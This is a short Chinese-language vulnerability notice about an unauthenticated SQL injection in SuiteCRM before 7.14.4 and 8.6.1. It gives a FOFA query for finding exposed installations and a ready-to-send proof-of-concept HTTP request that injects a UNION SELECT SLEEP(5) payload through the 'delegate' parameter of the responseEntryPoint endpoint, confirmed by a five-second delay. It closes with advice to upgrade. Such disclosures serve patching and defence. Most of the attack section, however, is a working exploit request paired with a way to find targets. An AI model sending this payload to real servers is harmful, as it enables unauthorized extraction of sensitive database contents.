0x01 产品简介

SuiteCRM是一款屡获殊荣的企业级开源客户关系管理系统，它具有强大的功能和高度的可定制性，且完全免费。

0x02 漏洞概述

SuiteCRM存在SQL注入漏洞，未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句，从而获取数据库敏感信息。

0x03 影响范围

SuiteCRM < 7.14.4

SuiteCRM < 8.6.1

0x04 复现环境

FOFA：title="SuiteCRM"

0x05 漏洞复现

PoC

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

延时5秒

0x06 修复建议 

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://suitecrm.com/